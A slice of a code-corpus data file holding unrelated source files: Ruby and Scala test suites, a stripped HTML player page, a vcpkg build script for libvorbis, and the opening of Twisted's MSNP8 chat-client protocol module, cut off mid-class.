/path\\/to\\/some\\/file\\.rb:35:in meth(\\?|o)d/\n end\n\n it \"outputs an elapsed time\" do\n @timer.should_receive(:elapsed).and_return(4.2)\n @formatter.finish\n $stdout.should include 'time=\"4.2\"'\n end\n\n it \"outputs overall elapsed time\" do\n @timer.should_receive(:elapsed).and_return(4.2)\n @formatter.finish\n $stdout.should include 'timeCount=\"4.2\"'\n end\n\n it \"outputs the number of examples as test count\" do\n @counter.should_receive(:examples).and_return(9)\n @formatter.finish\n $stdout.should include 'tests=\"9\"'\n end\n\n it \"outputs overall number of examples as test count\" do\n @counter.should_receive(:examples).and_return(9)\n @formatter.finish\n $stdout.should include 'testCount=\"9\"'\n end\n\n it \"outputs a failure count\" do\n @counter.should_receive(:failures).and_return(2)\n @formatter.finish\n $stdout.should include 'failureCount=\"2\"'\n end\n\n it \"outputs overall failure count\" do\n @counter.should_receive(:failures).and_return(2)\n @formatter.finish\n $stdout.should include 'failures=\"2\"'\n end\n\n it \"outputs an error count\" do\n @counter.should_receive(:errors).and_return(1)\n @formatter.finish\n $stdout.should include 'errors=\"1\"'\n end\n\n it \"outputs overall error count\" do\n @counter.should_receive(:errors).and_return(1)\n @formatter.finish\n $stdout.should include 'errorCount=\"1\"'\n end\nend\n"} {"text": "/*\n * Copyright (C) 2016 Lightbend Inc. \n */\n\npackage akka.stream.contrib\n\nimport akka.actor.ActorSystem\nimport akka.pattern.after\nimport akka.stream.ActorMaterializer\nimport akka.stream.contrib.SwitchMode.{Close, Open}\nimport akka.stream.scaladsl.{Keep, Sink, Source}\nimport akka.stream.testkit.scaladsl._\nimport org.scalatest._\nimport org.scalatest.Matchers._\nimport org.scalatest.concurrent.ScalaFutures\nimport scala.language.postfixOps\n\nimport scala.concurrent.duration._\n\nclass ValveSpec extends WordSpec with ScalaFutures {\n\n implicit val system = ActorSystem()\n implicit val materializer = ActorMaterializer()\n implicit val executionContext = materializer.executionContext\n\n \"A closed valve\" should {\n\n \"emit only 3 elements into a sequence when the valve is switched to open\" in {\n\n val (switchFut, seq) = Source(1 to 3)\n .viaMat(new Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n after(100 millis, system.scheduler) {\n switch.flip(Open)\n }.futureValue shouldBe true\n\n seq.futureValue should contain inOrder (1, 2, 3)\n }\n }\n\n \"emit only 5 elements when the valve is switched to open\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(new Valve(SwitchMode.Close))(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n probe.request(2)\n probe.expectNoMsg(100 millis)\n\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n }\n\n probe.expectNext shouldBe 1\n probe.expectNext shouldBe 2\n\n probe.request(3)\n probe.expectNext shouldBe 3\n probe.expectNext shouldBe 4\n probe.expectNext shouldBe 5\n\n probe.expectComplete()\n }\n }\n\n \"emit only 3 elements when the valve is switch to open/close/open\" in {\n val ((sourceProbe, switchFut), sinkProbe) = TestSource\n .probe[Int]\n .viaMat(Valve())(Keep.both)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n sinkProbe.request(1)\n whenReady(switch.flip(Close)) {\n _ shouldBe true\n }\n sourceProbe.sendNext(1)\n sinkProbe.expectNoMsg(100 millis)\n\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n 
}\n sinkProbe.expectNext shouldEqual 1\n\n whenReady(switch.flip(Close)) {\n _ shouldBe true\n }\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n }\n sinkProbe.expectNoMsg(100 millis)\n\n sinkProbe.request(1)\n sinkProbe.request(1)\n sourceProbe.sendNext(2)\n sourceProbe.sendNext(3)\n sourceProbe.sendComplete()\n\n sinkProbe.expectNext shouldBe 2\n sinkProbe.expectNext shouldBe 3\n\n sinkProbe.expectComplete()\n }\n }\n\n \"return false when the valve is already closed\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve(SwitchMode.Close))(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n whenReady(switch.flip(Close)) { element =>\n element should be(false)\n }\n whenReady(switch.flip(Close)) { element =>\n element should be(false)\n }\n }\n }\n\n \"emit nothing when the source is empty\" in {\n val (switch, seq) = Source.empty\n .viaMat(Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq, timeout(200 millis)) {\n _ shouldBe empty\n }\n }\n\n \"emit nothing when the source is failing\" in {\n val (switch, seq) = Source\n .failed(new IllegalArgumentException(\"Fake exception\"))\n .viaMat(Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq.failed) { e =>\n e shouldBe an[IllegalArgumentException]\n }\n }\n\n \"not pull elements again when opened and closed and re-opened\" in {\n\n val (probe, switchFut, resultFuture) = TestSource\n .probe[Int]\n .viaMat(Valve(SwitchMode.Close))(Keep.both)\n .toMat(Sink.head)((l, r) => (l._1, l._2, r))\n .run()\n\n whenReady(switchFut) { switch =>\n val result = for {\n _ <- switch.flip(SwitchMode.Open)\n _ <- switch.flip(SwitchMode.Close)\n _ <- switch.flip(SwitchMode.Open)\n _ = probe.sendNext(1)\n _ = probe.sendComplete()\n r <- resultFuture\n } yield r\n\n whenReady(result) {\n _ shouldBe 1\n }\n }\n }\n\n \"be in closed state\" in {\n val (switchFut, seq) = Source(1 to 3)\n .viaMat(new Valve(SwitchMode.Close))(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n whenReady(switch.getMode()) {\n _ shouldBe Close\n }\n }\n }\n\n }\n\n \"A opened valve\" should {\n\n \"emit 5 elements after it has been close/open\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve())(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n probe.request(2)\n probe.expectNext() shouldBe 1\n probe.expectNext() shouldBe 2\n\n whenReady(switch.flip(Close)) {\n _ shouldBe true\n }\n\n probe.request(1)\n probe.expectNoMsg(100 millis)\n\n whenReady(switch.flip(Open)) {\n _ shouldBe true\n }\n probe.expectNext() shouldBe 3\n\n probe.request(2)\n probe.expectNext() shouldBe 4\n probe.expectNext() shouldBe 5\n\n probe.expectComplete()\n }\n }\n\n \"return false when the valve is already opened\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve())(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n\n whenReady(switchFut) { switch =>\n whenReady(switch.flip(Open)) {\n _ shouldBe false\n }\n whenReady(switch.flip(Open)) {\n _ shouldBe false\n }\n }\n }\n\n \"emit only 3 elements into a sequence\" in {\n\n val (switch, seq) = Source(1 to 3)\n .viaMat(Valve())(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq, timeout(200 millis)) {\n _ should contain inOrder (1, 2, 3)\n }\n }\n\n \"emit nothing when the source is empty\" in {\n val (switch, seq) = Source.empty\n .viaMat(Valve())(Keep.right)\n 
.toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq, timeout(200 millis)) {\n _ shouldBe empty\n }\n\n }\n\n \"emit nothing when the source is failing\" in {\n val (switch, seq) = Source\n .failed(new IllegalArgumentException(\"Fake exception\"))\n .viaMat(Valve())(Keep.right)\n .toMat(Sink.seq)(Keep.both)\n .run()\n\n whenReady(seq.failed) { e =>\n e shouldBe an[IllegalArgumentException]\n }\n }\n\n \"not pull elements again when closed and re-opened\" in {\n\n val (probe, switchFut, resultFuture) = TestSource\n .probe[Int]\n .viaMat(Valve())(Keep.both)\n .toMat(Sink.head)((l, r) => (l._1, l._2, r))\n .run()\n\n whenReady(switchFut) { switch =>\n val result = for {\n _ <- switch.flip(SwitchMode.Close)\n _ <- switch.flip(SwitchMode.Open)\n _ = probe.sendNext(1)\n _ = probe.sendComplete()\n r <- resultFuture\n } yield r\n\n whenReady(result) {\n _ shouldBe 1\n }\n }\n }\n\n \"be in open state\" in {\n val (switchFut, probe) = Source(1 to 5)\n .viaMat(Valve())(Keep.right)\n .toMat(TestSink.probe[Int])(Keep.both)\n .run()\n whenReady(switchFut) { switch =>\n whenReady(switch.getMode()) {\n _ shouldBe Open\n }\n }\n }\n\n }\n}\n"} {"text": "\n\n\n\t\n\t\n\t\n\tSewise Player\n\n\n\t
\n\t\t\n\t\t\n\t
\n\t\n\n"} {"text": "vcpkg_from_github(\n OUT_SOURCE_PATH SOURCE_PATH\n REPO xiph/vorbis\n REF v1.3.7\n SHA512 bfb6f5dbfd49ed38b2b08b3667c06d02e68f649068a050f21a3cc7e1e56b27afd546aaa3199c4f6448f03f6e66a82f9a9dc2241c826d3d1d4acbd38339b9e9fb\n HEAD_REF master\n PATCHES\n 0001-Dont-export-vorbisenc-functions.patch\n)\n\nvcpkg_configure_cmake(\n SOURCE_PATH ${SOURCE_PATH}\n PREFER_NINJA\n)\n\nvcpkg_install_cmake()\nvcpkg_fixup_cmake_targets(\n CONFIG_PATH lib/cmake/Vorbis\n TARGET_PATH share/Vorbis\n)\n\nfile(REMOVE_RECURSE ${CURRENT_PACKAGES_DIR}/debug/include)\n\n# Handle copyright\nconfigure_file(${SOURCE_PATH}/COPYING ${CURRENT_PACKAGES_DIR}/share/${PORT}/copyright COPYONLY)\n\nvcpkg_copy_pdbs()\n\nif(WIN32 AND (NOT MINGW))\n vcpkg_replace_string(\"${CURRENT_PACKAGES_DIR}/debug/lib/pkgconfig/vorbis.pc\" \"-lm\" \"\")\n vcpkg_replace_string(\"${CURRENT_PACKAGES_DIR}/lib/pkgconfig/vorbis.pc\" \"-lm\" \"\")\nendif()\nvcpkg_fixup_pkgconfig()\n"} {"text": "# -*- test-case-name: twisted.words.test -*-\n# Copyright (c) Twisted Matrix Laboratories.\n# See LICENSE for details.\n\n\"\"\"\nMSNP8 Protocol (client only) - semi-experimental\n\nThis module provides support for clients using the MSN Protocol (MSNP8).\nThere are basically 3 servers involved in any MSN session:\n\nI{Dispatch server}\n\nThe DispatchClient class handles connections to the\ndispatch server, which basically delegates users to a\nsuitable notification server.\n\nYou will want to subclass this and handle the gotNotificationReferral\nmethod appropriately.\n\nI{Notification Server}\n\nThe NotificationClient class handles connections to the\nnotification server, which acts as a session server\n(state updates, message negotiation etc...)\n\nI{Switcboard Server}\n\nThe SwitchboardClient handles connections to switchboard\nservers which are used to conduct conversations with other users.\n\nThere are also two classes (FileSend and FileReceive) used\nfor file transfers.\n\nClients handle events in two ways.\n\n - each client request requiring a response will return a Deferred,\n the callback for same will be fired when the server sends the\n required response\n - Events which are not in response to any client request have\n respective methods which should be overridden and handled in\n an adequate manner\n\nMost client request callbacks require more than one argument,\nand since Deferreds can only pass the callback one result,\nmost of the time the callback argument will be a tuple of\nvalues (documented in the respective request method).\nTo make reading/writing code easier, callbacks can be defined in\na number of ways to handle this 'cleanly'. One way would be to\ndefine methods like: def callBack(self, (arg1, arg2, arg)): ...\nanother way would be to do something like:\nd.addCallback(lambda result: myCallback(*result)).\n\nIf the server sends an error response to a client request,\nthe errback of the corresponding Deferred will be called,\nthe argument being the corresponding error code.\n\nB{NOTE}:\nDue to the lack of an official spec for MSNP8, extra checking\nthan may be deemed necessary often takes place considering the\nserver is never 'wrong'. Thus, if gotBadLine (in any of the 3\nmain clients) is called, or an MSNProtocolError is raised, it's\nprobably a good idea to submit a bug report. 
;)\nUse of this module requires that PyOpenSSL is installed.\n\nTODO\n====\n- check message hooks with invalid x-msgsinvite messages.\n- font handling\n- switchboard factory\n\n@author: Sam Jordan\n\"\"\"\n\nimport types, operator, os\nfrom random import randint\nfrom urllib import quote, unquote\n\nfrom twisted.python import failure, log\nfrom twisted.python.hashlib import md5\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import Deferred, execute\nfrom twisted.internet.protocol import ClientFactory\ntry:\n from twisted.internet.ssl import ClientContextFactory\nexcept ImportError:\n ClientContextFactory = None\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.web.http import HTTPClient\n\n\nMSN_PROTOCOL_VERSION = \"MSNP8 CVR0\" # protocol version\nMSN_PORT = 1863 # default dispatch server port\nMSN_MAX_MESSAGE = 1664 # max message length\nMSN_CHALLENGE_STR = \"Q1P7W2E4J9R8U3S5\" # used for server challenges\nMSN_CVR_STR = \"0x0409 win 4.10 i386 MSNMSGR 5.0.0544 MSMSGS\" # :(\n\n# auth constants\nLOGIN_SUCCESS = 1\nLOGIN_FAILURE = 2\nLOGIN_REDIRECT = 3\n\n# list constants\nFORWARD_LIST = 1\nALLOW_LIST = 2\nBLOCK_LIST = 4\nREVERSE_LIST = 8\n\n# phone constants\nHOME_PHONE = \"PHH\"\nWORK_PHONE = \"PHW\"\nMOBILE_PHONE = \"PHM\"\nHAS_PAGER = \"MOB\"\n\n# status constants\nSTATUS_ONLINE = 'NLN'\nSTATUS_OFFLINE = 'FLN'\nSTATUS_HIDDEN = 'HDN'\nSTATUS_IDLE = 'IDL'\nSTATUS_AWAY = 'AWY'\nSTATUS_BUSY = 'BSY'\nSTATUS_BRB = 'BRB'\nSTATUS_PHONE = 'PHN'\nSTATUS_LUNCH = 'LUN'\n\nCR = \"\\r\"\nLF = \"\\n\"\n\n\nclass SSLRequired(Exception):\n \"\"\"\n This exception is raised when it is necessary to talk to a passport server\n using SSL, but the necessary SSL dependencies are unavailable.\n\n @since: 11.0\n \"\"\"\n\n\n\ndef checkParamLen(num, expected, cmd, error=None):\n if error == None:\n error = \"Invalid Number of Parameters for %s\" % cmd\n if num != expected:\n raise MSNProtocolError, error\n\ndef _parseHeader(h, v):\n \"\"\"\n Split a certin number of known\n header values with the format:\n field1=val,field2=val,field3=val into\n a dict mapping fields to values.\n @param h: the header's key\n @param v: the header's value as a string\n \"\"\"\n\n if h in ('passporturls','authentication-info','www-authenticate'):\n v = v.replace('Passport1.4','').lstrip()\n fields = {}\n for fieldPair in v.split(','):\n try:\n field,value = fieldPair.split('=',1)\n fields[field.lower()] = value\n except ValueError:\n fields[field.lower()] = ''\n return fields\n else:\n return v\n\ndef _parsePrimitiveHost(host):\n # Ho Ho Ho\n h,p = host.replace('https://','').split('/',1)\n p = '/' + p\n return h,p\n\n\ndef _login(userHandle, passwd, nexusServer, cached=0, authData=''):\n \"\"\"\n This function is used internally and should not ever be called\n directly.\n\n @raise SSLRequired: If there is no SSL support available.\n \"\"\"\n if ClientContextFactory is None:\n raise SSLRequired(\n 'Connecting to the Passport server requires SSL, but SSL is '\n 'unavailable.')\n\n cb = Deferred()\n def _cb(server, auth):\n loginFac = ClientFactory()\n loginFac.protocol = lambda : PassportLogin(cb, userHandle, passwd, server, auth)\n reactor.connectSSL(_parsePrimitiveHost(server)[0], 443, loginFac, ClientContextFactory())\n\n if cached:\n _cb(nexusServer, authData)\n else:\n fac = ClientFactory()\n d = Deferred()\n d.addCallbacks(_cb, callbackArgs=(authData,))\n d.addErrback(lambda f: cb.errback(f))\n fac.protocol = lambda : PassportNexus(d, nexusServer)\n 
reactor.connectSSL(_parsePrimitiveHost(nexusServer)[0], 443, fac, ClientContextFactory())\n return cb\n\n\nclass PassportNexus(HTTPClient):\n\n \"\"\"\n Used to obtain the URL of a valid passport\n login HTTPS server.\n\n This class is used internally and should\n not be instantiated directly -- that is,\n The passport logging in process is handled\n transparantly by NotificationClient.\n \"\"\"\n\n def __init__(self, deferred, host):\n self.deferred = deferred\n self.host, self.path = _parsePrimitiveHost(host)\n\n def connectionMade(self):\n HTTPClient.connectionMade(self)\n self.sendCommand('GET', self.path)\n self.sendHeader('Host', self.host)\n self.endHeaders()\n self.headers = {}\n\n def handleHeader(self, header, value):\n h = header.lower()\n self.headers[h] = _parseHeader(h, value)\n\n def handleEndHeaders(self):\n if self.connected:\n self.transport.loseConnection()\n if not self.headers.has_key('passporturls') or not self.headers['passporturls'].has_key('dalogin'):\n self.deferred.errback(failure.Failure(failure.DefaultException(\"Invalid Nexus Reply\")))\n self.deferred.callback('https://' + self.headers['passporturls']['dalogin'])\n\n def handleResponse(self, r):\n pass\n\nclass PassportLogin(HTTPClient):\n \"\"\"\n This class is used internally to obtain\n a login ticket from a passport HTTPS\n server -- it should not be used directly.\n \"\"\"\n\n _finished = 0\n\n def __init__(self, deferred, userHandle, passwd, host, authData):\n self.deferred = deferred\n self.userHandle = userHandle\n self.passwd = passwd\n self.authData = authData\n self.host, self.path = _parsePrimitiveHost(host)\n\n def connectionMade(self):\n self.sendCommand('GET', self.path)\n self.sendHeader('Authorization', 'Passport1.4 OrgVerb=GET,OrgURL=http://messenger.msn.com,' +\n 'sign-in=%s,pwd=%s,%s' % (quote(self.userHandle), self.passwd,self.authData))\n self.sendHeader('Host', self.host)\n self.endHeaders()\n self.headers = {}\n\n def handleHeader(self, header, value):\n h = header.lower()\n self.headers[h] = _parseHeader(h, value)\n\n def handleEndHeaders(self):\n if self._finished:\n return\n self._finished = 1 # I think we need this because of HTTPClient\n if self.connected:\n self.transport.loseConnection()\n authHeader = 'authentication-info'\n _interHeader = 'www-authenticate'\n if self.headers.has_key(_interHeader):\n authHeader = _interHeader\n try:\n info = self.headers[authHeader]\n status = info['da-status']\n handler = getattr(self, 'login_%s' % (status,), None)\n if handler:\n handler(info)\n else:\n raise Exception()\n except Exception, e:\n self.deferred.errback(failure.Failure(e))\n\n def handleResponse(self, r):\n pass\n\n def login_success(self, info):\n ticket = info['from-pp']\n ticket = ticket[1:len(ticket)-1]\n self.deferred.callback((LOGIN_SUCCESS, ticket))\n\n def login_failed(self, info):\n self.deferred.callback((LOGIN_FAILURE, unquote(info['cbtxt'])))\n\n def login_redir(self, info):\n self.deferred.callback((LOGIN_REDIRECT, self.headers['location'], self.authData))\n\n\nclass MSNProtocolError(Exception):\n \"\"\"\n This Exception is basically used for debugging\n purposes, as the official MSN server should never\n send anything _wrong_ and nobody in their right\n mind would run their B{own} MSN server.\n If it is raised by default command handlers\n (handle_BLAH) the error will be logged.\n \"\"\"\n pass\n\n\nclass MSNCommandFailed(Exception):\n \"\"\"\n The server said that the command failed.\n \"\"\"\n\n def __init__(self, errorCode):\n self.errorCode = errorCode\n\n def 
__str__(self):\n return (\"Command failed: %s (error code %d)\"\n % (errorCodes[self.errorCode], self.errorCode))\n\n\nclass MSNMessage:\n \"\"\"\n I am the class used to represent an 'instant' message.\n\n @ivar userHandle: The user handle (passport) of the sender\n (this is only used when receiving a message)\n @ivar screenName: The screen name of the sender (this is only used\n when receiving a message)\n @ivar message: The message\n @ivar headers: The message headers\n @type headers: dict\n @ivar length: The message length (including headers and line endings)\n @ivar ack: This variable is used to tell the server how to respond\n once the message has been sent. If set to MESSAGE_ACK\n (default) the server will respond with an ACK upon receiving\n the message, if set to MESSAGE_NACK the server will respond\n with a NACK upon failure to receive the message.\n If set to MESSAGE_ACK_NONE the server will do nothing.\n This is relevant for the return value of\n SwitchboardClient.sendMessage (which will return\n a Deferred if ack is set to either MESSAGE_ACK or MESSAGE_NACK\n and will fire when the respective ACK or NACK is received).\n If set to MESSAGE_ACK_NONE sendMessage will return None.\n \"\"\"\n MESSAGE_ACK = 'A'\n MESSAGE_NACK = 'N'\n MESSAGE_ACK_NONE = 'U'\n\n ack = MESSAGE_ACK\n\n def __init__(self, length=0, userHandle=\"\", screenName=\"\", message=\"\"):\n self.userHandle = userHandle\n self.screenName = screenName\n self.message = message\n self.headers = {'MIME-Version' : '1.0', 'Content-Type' : 'text/plain'}\n self.length = length\n self.readPos = 0\n\n def _calcMessageLen(self):\n \"\"\"\n used to calculte the number to send\n as the message length when sending a message.\n \"\"\"\n return reduce(operator.add, [len(x[0]) + len(x[1]) + 4 for x in self.headers.items()]) + len(self.message) + 2\n\n def setHeader(self, header, value):\n \"\"\" set the desired header \"\"\"\n self.headers[header] = value\n\n def getHeader(self, header):\n \"\"\"\n get the desired header value\n @raise KeyError: if no such header exists.\n \"\"\"\n return self.headers[header]\n\n def hasHeader(self, header):\n \"\"\" check to see if the desired header exists \"\"\"\n return self.headers.has_key(header)\n\n def getMessage(self):\n \"\"\" return the message - not including headers \"\"\"\n return self.message\n\n def setMessage(self, message):\n \"\"\" set the message text \"\"\"\n self.message = message\n\nclass MSNContact:\n\n \"\"\"\n This class represents a contact (user).\n\n @ivar userHandle: The contact's user handle (passport).\n @ivar screenName: The contact's screen name.\n @ivar groups: A list of all the group IDs which this\n contact belongs to.\n @ivar lists: An integer representing the sum of all lists\n that this contact belongs to.\n @ivar status: The contact's status code.\n @type status: str if contact's status is known, None otherwise.\n\n @ivar homePhone: The contact's home phone number.\n @type homePhone: str if known, otherwise None.\n @ivar workPhone: The contact's work phone number.\n @type workPhone: str if known, otherwise None.\n @ivar mobilePhone: The contact's mobile phone number.\n @type mobilePhone: str if known, otherwise None.\n @ivar hasPager: Whether or not this user has a mobile pager\n (true=yes, false=no)\n \"\"\"\n\n def __init__(self, userHandle=\"\", screenName=\"\", lists=0, groups=[], status=None):\n self.userHandle = userHandle\n self.screenName = screenName\n self.lists = lists\n self.groups = [] # if applicable\n self.status = status # current status\n\n 
# phone details\n self.homePhone = None\n self.workPhone = None\n self.mobilePhone = None\n self.hasPager = None\n\n def setPhone(self, phoneType, value):\n \"\"\"\n set phone numbers/values for this specific user.\n for phoneType check the *_PHONE constants and HAS_PAGER\n \"\"\"\n\n t = phoneType.upper()\n if t == HOME_PHONE:\n self.homePhone = value\n elif t == WORK_PHONE:\n self.workPhone = value\n elif t == MOBILE_PHONE:\n self.mobilePhone = value\n elif t == HAS_PAGER:\n self.hasPager = value\n else:\n raise ValueError, \"Invalid Phone Type\"\n\n def addToList(self, listType):\n \"\"\"\n Update the lists attribute to\n reflect being part of the\n given list.\n \"\"\"\n self.lists |= listType\n\n def removeFromList(self, listType):\n \"\"\"\n Update the lists attribute to\n reflect being removed from the\n given list.\n \"\"\"\n self.lists ^= listType\n\nclass MSNContactList:\n \"\"\"\n This class represents a basic MSN contact list.\n\n @ivar contacts: All contacts on my various lists\n @type contacts: dict (mapping user handles to MSNContact objects)\n @ivar version: The current contact list version (used for list syncing)\n @ivar groups: a mapping of group ids to group names\n (groups can only exist on the forward list)\n @type groups: dict\n\n B{Note}:\n This is used only for storage and doesn't effect the\n server's contact list.\n \"\"\"\n\n def __init__(self):\n self.contacts = {}\n self.version = 0\n self.groups = {}\n self.autoAdd = 0\n self.privacy = 0\n\n def _getContactsFromList(self, listType):\n \"\"\"\n Obtain all contacts which belong\n to the given list type.\n \"\"\"\n return dict([(uH,obj) for uH,obj in self.contacts.items() if obj.lists & listType])\n\n def addContact(self, contact):\n \"\"\"\n Add a contact\n \"\"\"\n self.contacts[contact.userHandle] = contact\n\n def remContact(self, userHandle):\n \"\"\"\n Remove a contact\n \"\"\"\n try:\n del self.contacts[userHandle]\n except KeyError:\n pass\n\n def getContact(self, userHandle):\n \"\"\"\n Obtain the MSNContact object\n associated with the given\n userHandle.\n @return: the MSNContact object if\n the user exists, or None.\n \"\"\"\n try:\n return self.contacts[userHandle]\n except KeyError:\n return None\n\n def getBlockedContacts(self):\n \"\"\"\n Obtain all the contacts on my block list\n \"\"\"\n return self._getContactsFromList(BLOCK_LIST)\n\n def getAuthorizedContacts(self):\n \"\"\"\n Obtain all the contacts on my auth list.\n (These are contacts which I have verified\n can view my state changes).\n \"\"\"\n return self._getContactsFromList(ALLOW_LIST)\n\n def getReverseContacts(self):\n \"\"\"\n Get all contacts on my reverse list.\n (These are contacts which have added me\n to their forward list).\n \"\"\"\n return self._getContactsFromList(REVERSE_LIST)\n\n def getContacts(self):\n \"\"\"\n Get all contacts on my forward list.\n (These are the contacts which I have added\n to my list).\n \"\"\"\n return self._getContactsFromList(FORWARD_LIST)\n\n def setGroup(self, id, name):\n \"\"\"\n Keep a mapping from the given id\n to the given name.\n \"\"\"\n self.groups[id] = name\n\n def remGroup(self, id):\n \"\"\"\n Removed the stored group\n mapping for the given id.\n \"\"\"\n try:\n del self.groups[id]\n except KeyError:\n pass\n for c in self.contacts:\n if id in c.groups:\n c.groups.remove(id)\n\n\nclass MSNEventBase(LineReceiver):\n \"\"\"\n This class provides support for handling / dispatching events and is the\n base class of the three main client protocols (DispatchClient,\n 
NotificationClient, SwitchboardClient)\n \"\"\"\n\n def __init__(self):\n self.ids = {} # mapping of ids to Deferreds\n self.currentID = 0\n self.connected = 0\n self.setLineMode()\n self.currentMessage = None\n\n def connectionLost(self, reason):\n self.ids = {}\n self.connected = 0\n\n def connectionMade(self):\n self.connected = 1\n\n def _fireCallback(self, id, *args):\n \"\"\"\n Fire the callback for the given id\n if one exists and return 1, else return false\n \"\"\"\n if self.ids.has_key(id):\n self.ids[id][0].callback(args)\n del self.ids[id]\n return 1\n return 0\n\n def _nextTransactionID(self):\n \"\"\" return a usable transaction ID \"\"\"\n self.currentID += 1\n if self.currentID > 1000:\n self.currentID = 1\n return self.currentID\n\n def _createIDMapping(self, data=None):\n \"\"\"\n return a unique transaction ID that is mapped internally to a\n deferred .. also store arbitrary data if it is needed\n \"\"\"\n id = self._nextTransactionID()\n d = Deferred()\n self.ids[id] = (d, data)\n return (id, d)\n\n def checkMessage(self, message):\n \"\"\"\n process received messages to check for file invitations and\n typing notifications and other control type messages\n \"\"\"\n raise NotImplementedError\n\n def lineReceived(self, line):\n if self.currentMessage:\n self.currentMessage.readPos += len(line+CR+LF)\n if line == \"\":\n self.setRawMode()\n if self.currentMessage.readPos == self.currentMessage.length:\n self.rawDataReceived(\"\") # :(\n return\n try:\n header, value = line.split(':')\n except ValueError:\n raise MSNProtocolError, \"Invalid Message Header\"\n self.currentMessage.setHeader(header, unquote(value).lstrip())\n return\n try:\n cmd, params = line.split(' ', 1)\n except ValueError:\n raise MSNProtocolError, \"Invalid Message, %s\" % repr(line)\n\n if len(cmd) != 3:\n raise MSNProtocolError, \"Invalid Command, %s\" % repr(cmd)\n if cmd.isdigit():\n errorCode = int(cmd)\n id = int(params.split()[0])\n if id in self.ids:\n self.ids[id][0].errback(MSNCommandFailed(errorCode))\n del self.ids[id]\n return\n else: # we received an error which doesn't map to a sent command\n self.gotError(errorCode)\n return\n\n handler = getattr(self, \"handle_%s\" % cmd.upper(), None)\n if handler:\n try:\n handler(params.split())\n except MSNProtocolError, why:\n self.gotBadLine(line, why)\n else:\n self.handle_UNKNOWN(cmd, params.split())\n\n def rawDataReceived(self, data):\n extra = \"\"\n self.currentMessage.readPos += len(data)\n diff = self.currentMessage.readPos - self.currentMessage.length\n if diff > 0:\n self.currentMessage.message += data[:-diff]\n extra = data[-diff:]\n elif diff == 0:\n self.currentMessage.message += data\n else:\n self.currentMessage += data\n return\n del self.currentMessage.readPos\n m = self.currentMessage\n self.currentMessage = None\n self.setLineMode(extra)\n if not self.checkMessage(m):\n return\n self.gotMessage(m)\n\n ### protocol command handlers - no need to override these.\n\n def handle_MSG(self, params):\n checkParamLen(len(params), 3, 'MSG')\n try:\n messageLen = int(params[2])\n except ValueError:\n raise MSNProtocolError, \"Invalid Parameter for MSG length argument\"\n self.currentMessage = MSNMessage(length=messageLen, userHandle=params[0], screenName=unquote(params[1]))\n\n def handle_UNKNOWN(self, cmd, params):\n \"\"\" implement me in subclasses if you want to handle unknown events \"\"\"\n log.msg(\"Received unknown command (%s), params: %s\" % (cmd, params))\n\n ### callbacks\n\n def gotMessage(self, message):\n \"\"\"\n called 
when we receive a message - override in notification\n and switchboard clients\n \"\"\"\n raise NotImplementedError\n\n def gotBadLine(self, line, why):\n \"\"\" called when a handler notifies me that this line is broken \"\"\"\n log.msg('Error in line: %s (%s)' % (line, why))\n\n def gotError(self, errorCode):\n \"\"\"\n called when the server sends an error which is not in\n response to a sent command (ie. it has no matching transaction ID)\n \"\"\"\n log.msg('Error %s' % (errorCodes[errorCode]))\n\n\n\nclass DispatchClient(MSNEventBase):\n \"\"\"\n This class provides support for clients connecting to the dispatch server\n @ivar userHandle: your user handle (passport) needed before connecting.\n \"\"\"\n\n # eventually this may become an attribute of the\n # factory.\n userHandle = \"\"\n\n def connectionMade(self):\n MSNEventBase.connectionMade(self)\n self.sendLine('VER %s %s' % (self._nextTransactionID(), MSN_PROTOCOL_VERSION))\n\n ### protocol command handlers ( there is no need to override these )\n\n def handle_VER(self, params):\n id = self._nextTransactionID()\n self.sendLine(\"CVR %s %s %s\" % (id, MSN_CVR_STR, self.userHandle))\n\n def handle_CVR(self, params):\n self.sendLine(\"USR %s TWN I %s\" % (self._nextTransactionID(), self.userHandle))\n\n def handle_XFR(self, params):\n if len(params) < 4:\n raise MSNProtocolError, \"Invalid number of parameters for XFR\"\n id, refType, addr = params[:3]\n # was addr a host:port pair?\n try:\n host, port = addr.split(':')\n except ValueError:\n host = addr\n port = MSN_PORT\n if refType == \"NS\":\n self.gotNotificationReferral(host, int(port))\n\n ### callbacks\n\n def gotNotificationReferral(self, host, port):\n \"\"\"\n called when we get a referral to the notification server.\n\n @param host: the notification server's hostname\n @param port: the port to connect to\n \"\"\"\n pass\n\n\nclass NotificationClient(MSNEventBase):\n \"\"\"\n This class provides support for clients connecting\n to the notification server.\n \"\"\"\n\n factory = None # sssh pychecker\n\n def __init__(self, currentID=0):\n MSNEventBase.__init__(self)\n self.currentID = currentID\n self._state = ['DISCONNECTED', {}]\n\n def _setState(self, state):\n self._state[0] = state\n\n def _getState(self):\n return self._state[0]\n\n def _getStateData(self, key):\n return self._state[1][key]\n\n def _setStateData(self, key, value):\n self._state[1][key] = value\n\n def _remStateData(self, *args):\n for key in args:\n del self._state[1][key]\n\n def connectionMade(self):\n MSNEventBase.connectionMade(self)\n 